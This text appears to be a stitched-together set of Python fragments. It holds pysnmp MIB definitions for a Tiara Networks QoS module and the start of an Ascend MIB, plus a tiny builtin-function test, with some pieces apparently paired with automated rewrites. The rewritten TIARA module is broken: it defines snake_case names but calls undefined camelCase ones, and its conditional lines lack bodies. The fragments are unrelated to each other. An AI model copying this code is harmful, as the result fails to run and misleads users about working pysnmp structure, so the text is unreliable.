if mibBuilder.loadTexts: redTxAvgQueueSize.setStatus('current')
redTxMaxAvgQueueSize = MibTableColumn((1, 3, 6, 1, 4, 1, 3174, 2, 17, 2, 1, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: redTxMaxAvgQueueSize.setStatus('current')
redTxDropRate = MibTableColumn((1, 3, 6, 1, 4, 1, 3174, 2, 17, 2, 1, 5), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: redTxDropRate.setStatus('current')
redTxMinThresholdSuccess = MibTableColumn((1, 3, 6, 1, 4, 1, 3174, 2, 17, 2, 1, 6), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: redTxMinThresholdSuccess.setStatus('current')
redTxMaxThresholdFailure = MibTableColumn((1, 3, 6, 1, 4, 1, 3174, 2, 17, 2, 1, 7), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: redTxMaxThresholdFailure.setStatus('current')
redTxMinMaxRangeSuccess = MibTableColumn((1, 3, 6, 1, 4, 1, 3174, 2, 17, 2, 1, 8), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: redTxMinMaxRangeSuccess.setStatus('current')
redTxMinMaxRangeFailure = MibTableColumn((1, 3, 6, 1, 4, 1, 3174, 2, 17, 2, 1, 9), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: redTxMinMaxRangeFailure.setStatus('current')
redTxControlSuccess = MibTableColumn((1, 3, 6, 1, 4, 1, 3174, 2, 17, 2, 1, 10), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: redTxControlSuccess.setStatus('current')
tiaraCbqConfigTable = MibTable((1, 3, 6, 1, 4, 1, 3174, 2, 17, 3), )
if mibBuilder.loadTexts: tiaraCbqConfigTable.setStatus('current')
tiaraCbqConfigEntry = MibTableRow((1, 3, 6, 1, 4, 1, 3174, 2, 17, 3, 1), ).setIndexNames((0, "TIARA-IP-MIB", "tiaraIpIfIndex"), (0, "TIARA-QOS-MIB", "cbqClassIndex"))
if mibBuilder.loadTexts: tiaraCbqConfigEntry.setStatus('current')
cbqClassIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 3174, 2, 17, 3, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cbqClassIndex.setStatus('current')
cbqClassName = MibTableColumn((1, 3, 6, 1, 4, 1, 3174, 2, 17, 3, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cbqClassName.setStatus('current')
cbqClassParentName = MibTableColumn((1, 3, 6, 1, 4, 1, 3174, 2, 17, 3, 1, 3), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cbqClassParentName.setStatus('current')
cbqClassBandwidth = MibTableColumn((1, 3, 6, 1, 4, 1, 3174, 2, 17, 3, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cbqClassBandwidth.setStatus('current')
cbqClassBurstTolerance = MibTableColumn((1, 3, 6, 1, 4, 1, 3174, 2, 17, 3, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cbqClassBurstTolerance.setStatus('current')
cbqClassKeyType = MibTableColumn((1, 3, 6, 1, 4, 1, 3174, 2, 17, 3, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7))).clone(namedValues=NamedValues(("cbqClassifyTypeNotSet", 1), ("cbqClassifySrcIp", 2), ("cbqClassifyDestIp", 3), ("cbqClassifySrcPort", 4), ("cbqClassifyDestPort", 5), ("cbqClassifyProtocolType", 6), ("cbqClassifyVlanId", 7)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cbqClassKeyType.setStatus('current')
cbqClassIsDefault = MibTableColumn((1, 3, 6, 1, 4, 1, 3174, 2, 17, 3, 1, 7), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cbqClassIsDefault.setStatus('current')
cbqClassAverageBandwidth = MibTableColumn((1, 3, 6, 1, 4, 1, 3174, 2, 17, 3, 1, 8), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cbqClassAverageBandwidth.setStatus('current')
tiaraCbqClassKeyTable = MibTable((1, 3, 6, 1, 4, 1, 3174, 2, 17, 4), )
if mibBuilder.loadTexts: tiaraCbqClassKeyTable.setStatus('current')
tiaraCbqClassKeyTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 3174, 2, 17, 4, 1), ).setIndexNames((0, "TIARA-IP-MIB", "tiaraIpIfIndex"), (0, "TIARA-QOS-MIB", "cbqClassIndex"), (0, "TIARA-QOS-MIB", "cbqClassKeyIndex"))
if mibBuilder.loadTexts: tiaraCbqClassKeyTableEntry.setStatus('current')
cbqClassKeyIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 3174, 2, 17, 4, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cbqClassKeyIndex.setStatus('current')
cbqKeyClassName = MibTableColumn((1, 3, 6, 1, 4, 1, 3174, 2, 17, 4, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cbqKeyClassName.setStatus('current')
cbqClassKeyVlanId = MibTableColumn((1, 3, 6, 1, 4, 1, 3174, 2, 17, 4, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cbqClassKeyVlanId.setStatus('current')
cbqClassKeyIpAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 3174, 2, 17, 4, 1, 4), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cbqClassKeyIpAddress.setStatus('current')
cbqClassKeyIpNetMask = MibTableColumn((1, 3, 6, 1, 4, 1, 3174, 2, 17, 4, 1, 5), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cbqClassKeyIpNetMask.setStatus('current')
cbqClassKeyPort = MibTableColumn((1, 3, 6, 1, 4, 1, 3174, 2, 17, 4, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cbqClassKeyPort.setStatus('current')
cbqClassKeyProtocolType = MibTableColumn((1, 3, 6, 1, 4, 1, 3174, 2, 17, 4, 1, 7), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cbqClassKeyProtocolType.setStatus('current')
tiaraCbqStatsTable = MibTable((1, 3, 6, 1, 4, 1, 3174, 2, 17, 5), )
if mibBuilder.loadTexts: tiaraCbqStatsTable.setStatus('current')
tiaraCbqStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 3174, 2, 17, 5, 1), ).setIndexNames((0, "TIARA-IP-MIB", "tiaraIpIfIndex"), (0, "TIARA-QOS-MIB", "cbqClassIndex"))
if mibBuilder.loadTexts: tiaraCbqStatsEntry.setStatus('current')
cbqStatsClassName = MibTableColumn((1, 3, 6, 1, 4, 1, 3174, 2, 17, 5, 1, 1), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cbqStatsClassName.setStatus('current')
cbqClassPacketsForwarded = MibTableColumn((1, 3, 6, 1, 4, 1, 3174, 2, 17, 5, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cbqClassPacketsForwarded.setStatus('current')
cbqClassBytesForwarded = MibTableColumn((1, 3, 6, 1, 4, 1, 3174, 2, 17, 5, 1, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cbqClassBytesForwarded.setStatus('current')
cbqClassPacketsDropped = MibTableColumn((1, 3, 6, 1, 4, 1, 3174, 2, 17, 5, 1, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cbqClassPacketsDropped.setStatus('current')
cbqClassBytesDropped = MibTableColumn((1, 3, 6, 1, 4, 1, 3174, 2, 17, 5, 1, 5), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cbqClassBytesDropped.setStatus('current')
cbqClassBurstExceedCount = MibTableColumn((1, 3, 6, 1, 4, 1, 3174, 2, 17, 5, 1, 6), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cbqClassBurstExceedCount.setStatus('current')
mibBuilder.exportSymbols("TIARA-QOS-MIB", redTxWqBiasFactor=redTxWqBiasFactor, tiaraCbqStatsEntry=tiaraCbqStatsEntry, cbqClassIsDefault=cbqClassIsDefault, redTxMaxThresholdFailure=redTxMaxThresholdFailure, redTxMinThresholdSuccess=redTxMinThresholdSuccess, tiaraCbqConfigTable=tiaraCbqConfigTable, cbqClassBytesDropped=cbqClassBytesDropped, redTxAvgQueueSize=redTxAvgQueueSize, redTxMaxLoanedCount=redTxMaxLoanedCount, cbqClassBurstTolerance=cbqClassBurstTolerance, tiaraRedConfigEntry=tiaraRedConfigEntry, cbqClassKeyVlanId=cbqClassKeyVlanId, redTxControlSuccess=redTxControlSuccess, cbqClassBandwidth=cbqClassBandwidth, cbqStatsClassName=cbqStatsClassName, cbqClassPacketsForwarded=cbqClassPacketsForwarded, cbqClassPacketsDropped=cbqClassPacketsDropped, tiaraCbqClassKeyTableEntry=tiaraCbqClassKeyTableEntry, cbqClassKeyIpNetMask=cbqClassKeyIpNetMask, redTxLoanedCount=redTxLoanedCount, tiaraQosMib=tiaraQosMib, redTxDropRate=redTxDropRate, cbqKeyClassName=cbqKeyClassName, cbqClassKeyProtocolType=cbqClassKeyProtocolType, cbqClassKeyIndex=cbqClassKeyIndex, PYSNMP_MODULE_ID=tiaraQosMib, cbqClassBytesForwarded=cbqClassBytesForwarded, cbqClassAverageBandwidth=cbqClassAverageBandwidth, cbqClassName=cbqClassName, tiaraCbqStatsTable=tiaraCbqStatsTable, redTxMinMaxRangeFailure=redTxMinMaxRangeFailure, redTxMinMaxRangeSuccess=redTxMinMaxRangeSuccess, redTxMaxThreshold=redTxMaxThreshold, redTxMaxAvgQueueSize=redTxMaxAvgQueueSize, cbqClassBurstExceedCount=cbqClassBurstExceedCount, redTxMinThreshold=redTxMinThreshold, cbqClassKeyType=cbqClassKeyType, tiaraRedStatTable=tiaraRedStatTable, tiaraRedConfigTable=tiaraRedConfigTable, cbqClassParentName=cbqClassParentName, tiaraRedStatEntry=tiaraRedStatEntry, redTxEnable=redTxEnable, tiaraCbqClassKeyTable=tiaraCbqClassKeyTable, cbqClassKeyIpAddress=cbqClassKeyIpAddress, cbqClassKeyPort=cbqClassKeyPort, tiaraCbqConfigEntry=tiaraCbqConfigEntry, cbqClassIndex=cbqClassIndex)
| (object_identifier, octet_string, integer) = mibBuilder.importSymbols('ASN1', 'ObjectIdentifier', 'OctetString', 'Integer')
(named_values,) = mibBuilder.importSymbols('ASN1-ENUMERATION', 'NamedValues')
(single_value_constraint, value_range_constraint, value_size_constraint, constraints_union, constraints_intersection) = mibBuilder.importSymbols('ASN1-REFINEMENT', 'SingleValueConstraint', 'ValueRangeConstraint', 'ValueSizeConstraint', 'ConstraintsUnion', 'ConstraintsIntersection')
(module_compliance, notification_group) = mibBuilder.importSymbols('SNMPv2-CONF', 'ModuleCompliance', 'NotificationGroup')
(counter32, module_identity, time_ticks, unsigned32, gauge32, object_identity, iso, notification_type, mib_identifier, counter64, mib_scalar, mib_table, mib_table_row, mib_table_column, integer32, ip_address, bits) = mibBuilder.importSymbols('SNMPv2-SMI', 'Counter32', 'ModuleIdentity', 'TimeTicks', 'Unsigned32', 'Gauge32', 'ObjectIdentity', 'iso', 'NotificationType', 'MibIdentifier', 'Counter64', 'MibScalar', 'MibTable', 'MibTableRow', 'MibTableColumn', 'Integer32', 'IpAddress', 'Bits')
(display_string, textual_convention, truth_value) = mibBuilder.importSymbols('SNMPv2-TC', 'DisplayString', 'TextualConvention', 'TruthValue')
(tiara_ip_if_index,) = mibBuilder.importSymbols('TIARA-IP-MIB', 'tiaraIpIfIndex')
(tiara_mgmt,) = mibBuilder.importSymbols('TIARA-NETWORKS-SMI', 'tiaraMgmt')
tiara_qos_mib = module_identity((1, 3, 6, 1, 4, 1, 3174, 2, 17))
tiaraQosMib.setRevisions(('1900-02-07 00:00',))
if mibBuilder.loadTexts:
tiaraQosMib.setLastUpdated('0006100000Z')
if mibBuilder.loadTexts:
tiaraQosMib.setOrganization('Tiara Networks Inc.')
tiara_red_config_table = mib_table((1, 3, 6, 1, 4, 1, 3174, 2, 17, 1))
if mibBuilder.loadTexts:
tiaraRedConfigTable.setStatus('current')
tiara_red_config_entry = mib_table_row((1, 3, 6, 1, 4, 1, 3174, 2, 17, 1, 1)).setIndexNames((0, 'TIARA-IP-MIB', 'tiaraIpIfIndex'))
if mibBuilder.loadTexts:
tiaraRedConfigEntry.setStatus('current')
red_tx_max_threshold = mib_table_column((1, 3, 6, 1, 4, 1, 3174, 2, 17, 1, 1, 1), integer32()).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
redTxMaxThreshold.setStatus('current')
red_tx_min_threshold = mib_table_column((1, 3, 6, 1, 4, 1, 3174, 2, 17, 1, 1, 2), integer32()).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
redTxMinThreshold.setStatus('current')
red_tx_wq_bias_factor = mib_table_column((1, 3, 6, 1, 4, 1, 3174, 2, 17, 1, 1, 3), integer32().subtype(subtypeSpec=value_range_constraint(3, 20))).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
redTxWqBiasFactor.setStatus('current')
red_tx_enable = mib_table_column((1, 3, 6, 1, 4, 1, 3174, 2, 17, 1, 1, 4), truth_value()).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
redTxEnable.setStatus('current')
tiara_red_stat_table = mib_table((1, 3, 6, 1, 4, 1, 3174, 2, 17, 2))
if mibBuilder.loadTexts:
tiaraRedStatTable.setStatus('current')
tiara_red_stat_entry = mib_table_row((1, 3, 6, 1, 4, 1, 3174, 2, 17, 2, 1)).setIndexNames((0, 'TIARA-IP-MIB', 'tiaraIpIfIndex'))
if mibBuilder.loadTexts:
tiaraRedStatEntry.setStatus('current')
red_tx_loaned_count = mib_table_column((1, 3, 6, 1, 4, 1, 3174, 2, 17, 2, 1, 1), counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
redTxLoanedCount.setStatus('current')
red_tx_max_loaned_count = mib_table_column((1, 3, 6, 1, 4, 1, 3174, 2, 17, 2, 1, 2), counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
redTxMaxLoanedCount.setStatus('current')
red_tx_avg_queue_size = mib_table_column((1, 3, 6, 1, 4, 1, 3174, 2, 17, 2, 1, 3), counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
redTxAvgQueueSize.setStatus('current')
red_tx_max_avg_queue_size = mib_table_column((1, 3, 6, 1, 4, 1, 3174, 2, 17, 2, 1, 4), counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
redTxMaxAvgQueueSize.setStatus('current')
red_tx_drop_rate = mib_table_column((1, 3, 6, 1, 4, 1, 3174, 2, 17, 2, 1, 5), counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
redTxDropRate.setStatus('current')
red_tx_min_threshold_success = mib_table_column((1, 3, 6, 1, 4, 1, 3174, 2, 17, 2, 1, 6), counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
redTxMinThresholdSuccess.setStatus('current')
red_tx_max_threshold_failure = mib_table_column((1, 3, 6, 1, 4, 1, 3174, 2, 17, 2, 1, 7), counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
redTxMaxThresholdFailure.setStatus('current')
red_tx_min_max_range_success = mib_table_column((1, 3, 6, 1, 4, 1, 3174, 2, 17, 2, 1, 8), counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
redTxMinMaxRangeSuccess.setStatus('current')
red_tx_min_max_range_failure = mib_table_column((1, 3, 6, 1, 4, 1, 3174, 2, 17, 2, 1, 9), counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
redTxMinMaxRangeFailure.setStatus('current')
red_tx_control_success = mib_table_column((1, 3, 6, 1, 4, 1, 3174, 2, 17, 2, 1, 10), counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
redTxControlSuccess.setStatus('current')
tiara_cbq_config_table = mib_table((1, 3, 6, 1, 4, 1, 3174, 2, 17, 3))
if mibBuilder.loadTexts:
tiaraCbqConfigTable.setStatus('current')
tiara_cbq_config_entry = mib_table_row((1, 3, 6, 1, 4, 1, 3174, 2, 17, 3, 1)).setIndexNames((0, 'TIARA-IP-MIB', 'tiaraIpIfIndex'), (0, 'TIARA-QOS-MIB', 'cbqClassIndex'))
if mibBuilder.loadTexts:
tiaraCbqConfigEntry.setStatus('current')
cbq_class_index = mib_table_column((1, 3, 6, 1, 4, 1, 3174, 2, 17, 3, 1, 1), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
cbqClassIndex.setStatus('current')
cbq_class_name = mib_table_column((1, 3, 6, 1, 4, 1, 3174, 2, 17, 3, 1, 2), display_string()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
cbqClassName.setStatus('current')
cbq_class_parent_name = mib_table_column((1, 3, 6, 1, 4, 1, 3174, 2, 17, 3, 1, 3), display_string()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
cbqClassParentName.setStatus('current')
cbq_class_bandwidth = mib_table_column((1, 3, 6, 1, 4, 1, 3174, 2, 17, 3, 1, 4), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
cbqClassBandwidth.setStatus('current')
cbq_class_burst_tolerance = mib_table_column((1, 3, 6, 1, 4, 1, 3174, 2, 17, 3, 1, 5), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
cbqClassBurstTolerance.setStatus('current')
cbq_class_key_type = mib_table_column((1, 3, 6, 1, 4, 1, 3174, 2, 17, 3, 1, 6), integer32().subtype(subtypeSpec=constraints_union(single_value_constraint(1, 2, 3, 4, 5, 6, 7))).clone(namedValues=named_values(('cbqClassifyTypeNotSet', 1), ('cbqClassifySrcIp', 2), ('cbqClassifyDestIp', 3), ('cbqClassifySrcPort', 4), ('cbqClassifyDestPort', 5), ('cbqClassifyProtocolType', 6), ('cbqClassifyVlanId', 7)))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
cbqClassKeyType.setStatus('current')
cbq_class_is_default = mib_table_column((1, 3, 6, 1, 4, 1, 3174, 2, 17, 3, 1, 7), truth_value()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
cbqClassIsDefault.setStatus('current')
cbq_class_average_bandwidth = mib_table_column((1, 3, 6, 1, 4, 1, 3174, 2, 17, 3, 1, 8), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
cbqClassAverageBandwidth.setStatus('current')
tiara_cbq_class_key_table = mib_table((1, 3, 6, 1, 4, 1, 3174, 2, 17, 4))
if mibBuilder.loadTexts:
tiaraCbqClassKeyTable.setStatus('current')
tiara_cbq_class_key_table_entry = mib_table_row((1, 3, 6, 1, 4, 1, 3174, 2, 17, 4, 1)).setIndexNames((0, 'TIARA-IP-MIB', 'tiaraIpIfIndex'), (0, 'TIARA-QOS-MIB', 'cbqClassIndex'), (0, 'TIARA-QOS-MIB', 'cbqClassKeyIndex'))
if mibBuilder.loadTexts:
tiaraCbqClassKeyTableEntry.setStatus('current')
cbq_class_key_index = mib_table_column((1, 3, 6, 1, 4, 1, 3174, 2, 17, 4, 1, 1), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
cbqClassKeyIndex.setStatus('current')
cbq_key_class_name = mib_table_column((1, 3, 6, 1, 4, 1, 3174, 2, 17, 4, 1, 2), display_string()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
cbqKeyClassName.setStatus('current')
cbq_class_key_vlan_id = mib_table_column((1, 3, 6, 1, 4, 1, 3174, 2, 17, 4, 1, 3), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
cbqClassKeyVlanId.setStatus('current')
cbq_class_key_ip_address = mib_table_column((1, 3, 6, 1, 4, 1, 3174, 2, 17, 4, 1, 4), ip_address()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
cbqClassKeyIpAddress.setStatus('current')
cbq_class_key_ip_net_mask = mib_table_column((1, 3, 6, 1, 4, 1, 3174, 2, 17, 4, 1, 5), ip_address()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
cbqClassKeyIpNetMask.setStatus('current')
cbq_class_key_port = mib_table_column((1, 3, 6, 1, 4, 1, 3174, 2, 17, 4, 1, 6), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
cbqClassKeyPort.setStatus('current')
cbq_class_key_protocol_type = mib_table_column((1, 3, 6, 1, 4, 1, 3174, 2, 17, 4, 1, 7), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
cbqClassKeyProtocolType.setStatus('current')
tiara_cbq_stats_table = mib_table((1, 3, 6, 1, 4, 1, 3174, 2, 17, 5))
if mibBuilder.loadTexts:
tiaraCbqStatsTable.setStatus('current')
tiara_cbq_stats_entry = mib_table_row((1, 3, 6, 1, 4, 1, 3174, 2, 17, 5, 1)).setIndexNames((0, 'TIARA-IP-MIB', 'tiaraIpIfIndex'), (0, 'TIARA-QOS-MIB', 'cbqClassIndex'))
if mibBuilder.loadTexts:
tiaraCbqStatsEntry.setStatus('current')
cbq_stats_class_name = mib_table_column((1, 3, 6, 1, 4, 1, 3174, 2, 17, 5, 1, 1), display_string()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
cbqStatsClassName.setStatus('current')
cbq_class_packets_forwarded = mib_table_column((1, 3, 6, 1, 4, 1, 3174, 2, 17, 5, 1, 2), counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
cbqClassPacketsForwarded.setStatus('current')
cbq_class_bytes_forwarded = mib_table_column((1, 3, 6, 1, 4, 1, 3174, 2, 17, 5, 1, 3), counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
cbqClassBytesForwarded.setStatus('current')
cbq_class_packets_dropped = mib_table_column((1, 3, 6, 1, 4, 1, 3174, 2, 17, 5, 1, 4), counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
cbqClassPacketsDropped.setStatus('current')
cbq_class_bytes_dropped = mib_table_column((1, 3, 6, 1, 4, 1, 3174, 2, 17, 5, 1, 5), counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
cbqClassBytesDropped.setStatus('current')
cbq_class_burst_exceed_count = mib_table_column((1, 3, 6, 1, 4, 1, 3174, 2, 17, 5, 1, 6), counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
cbqClassBurstExceedCount.setStatus('current')
mibBuilder.exportSymbols('TIARA-QOS-MIB', redTxWqBiasFactor=redTxWqBiasFactor, tiaraCbqStatsEntry=tiaraCbqStatsEntry, cbqClassIsDefault=cbqClassIsDefault, redTxMaxThresholdFailure=redTxMaxThresholdFailure, redTxMinThresholdSuccess=redTxMinThresholdSuccess, tiaraCbqConfigTable=tiaraCbqConfigTable, cbqClassBytesDropped=cbqClassBytesDropped, redTxAvgQueueSize=redTxAvgQueueSize, redTxMaxLoanedCount=redTxMaxLoanedCount, cbqClassBurstTolerance=cbqClassBurstTolerance, tiaraRedConfigEntry=tiaraRedConfigEntry, cbqClassKeyVlanId=cbqClassKeyVlanId, redTxControlSuccess=redTxControlSuccess, cbqClassBandwidth=cbqClassBandwidth, cbqStatsClassName=cbqStatsClassName, cbqClassPacketsForwarded=cbqClassPacketsForwarded, cbqClassPacketsDropped=cbqClassPacketsDropped, tiaraCbqClassKeyTableEntry=tiaraCbqClassKeyTableEntry, cbqClassKeyIpNetMask=cbqClassKeyIpNetMask, redTxLoanedCount=redTxLoanedCount, tiaraQosMib=tiaraQosMib, redTxDropRate=redTxDropRate, cbqKeyClassName=cbqKeyClassName, cbqClassKeyProtocolType=cbqClassKeyProtocolType, cbqClassKeyIndex=cbqClassKeyIndex, PYSNMP_MODULE_ID=tiaraQosMib, cbqClassBytesForwarded=cbqClassBytesForwarded, cbqClassAverageBandwidth=cbqClassAverageBandwidth, cbqClassName=cbqClassName, tiaraCbqStatsTable=tiaraCbqStatsTable, redTxMinMaxRangeFailure=redTxMinMaxRangeFailure, redTxMinMaxRangeSuccess=redTxMinMaxRangeSuccess, redTxMaxThreshold=redTxMaxThreshold, redTxMaxAvgQueueSize=redTxMaxAvgQueueSize, cbqClassBurstExceedCount=cbqClassBurstExceedCount, redTxMinThreshold=redTxMinThreshold, cbqClassKeyType=cbqClassKeyType, tiaraRedStatTable=tiaraRedStatTable, tiaraRedConfigTable=tiaraRedConfigTable, cbqClassParentName=cbqClassParentName, tiaraRedStatEntry=tiaraRedStatEntry, redTxEnable=redTxEnable, tiaraCbqClassKeyTable=tiaraCbqClassKeyTable, cbqClassKeyIpAddress=cbqClassKeyIpAddress, cbqClassKeyPort=cbqClassKeyPort, tiaraCbqConfigEntry=tiaraCbqConfigEntry, cbqClassIndex=cbqClassIndex) |
'''
builtin functions
'''
def main():
o = ord('x')
TestError( o == 120 )
#n = float('1.1')
#TestError( n==1.1 )
#n = float('NaN')
#TestError( isNaN(n)==True )
#r = round( 1.1234, 2)
#print(r)
#TestError( str(r) == '1.12' )
#r = round( 100.001, 2)
#TestError( r == 100 )
#i = int( 100.1 )
#TestError( i == 100 )
#r = round( 5.49 )
#TestError( r == 5 )
#r = round( 5.49, 1 )
#TestError( r == 5.5 )
| """
builtin functions
"""
def main():
o = ord('x')
test_error(o == 120) |
#
# PySNMP MIB module ASCEND-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/ASCEND-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 17:09:57 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, ObjectIdentifier, OctetString = mibBuilder.importSymbols("ASN1", "Integer", "ObjectIdentifier", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsIntersection, SingleValueConstraint, ValueRangeConstraint, ValueSizeConstraint, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsIntersection", "SingleValueConstraint", "ValueRangeConstraint", "ValueSizeConstraint", "ConstraintsUnion")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
enterprises, Counter64, NotificationType, ModuleIdentity, iso, MibScalar, MibTable, MibTableRow, MibTableColumn, ObjectIdentity, IpAddress, Bits, Integer32, Counter32, MibIdentifier, Gauge32, Unsigned32, TimeTicks = mibBuilder.importSymbols("SNMPv2-SMI", "enterprises", "Counter64", "NotificationType", "ModuleIdentity", "iso", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "ObjectIdentity", "IpAddress", "Bits", "Integer32", "Counter32", "MibIdentifier", "Gauge32", "Unsigned32", "TimeTicks")
DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention")
class DisplayString(OctetString):
pass
ascend = MibIdentifier((1, 3, 6, 1, 4, 1, 529))
products = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1))
slots = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 2))
hostTypes = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 3))
advancedAgent = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 4))
lanTypes = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 5))
doGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 6))
hostStatus = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 7))
console = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 8))
systemStatusGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 9))
eventGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 10))
callStatusGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 11))
sessionStatusGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 12))
radiusGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 13))
mCastGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 14))
lanModemGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 15))
firewallGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 16))
wanDialoutPkt = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 17))
powerSupply = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 18))
multiShelf = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 19))
miscGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 20))
asgGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 21))
flashGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 22))
configuration = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 23))
atmpGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 24))
callLoggingGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 25))
srvcMgmtGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 26))
resourcesGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 27))
voipGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 28))
mgGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 29))
sparingGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 30))
cltmGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 31))
multiband = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 1))
max = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 2))
pipeline = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 3))
max_tnt = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 4)).setLabel("max-tnt")
dslTnt = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 5))
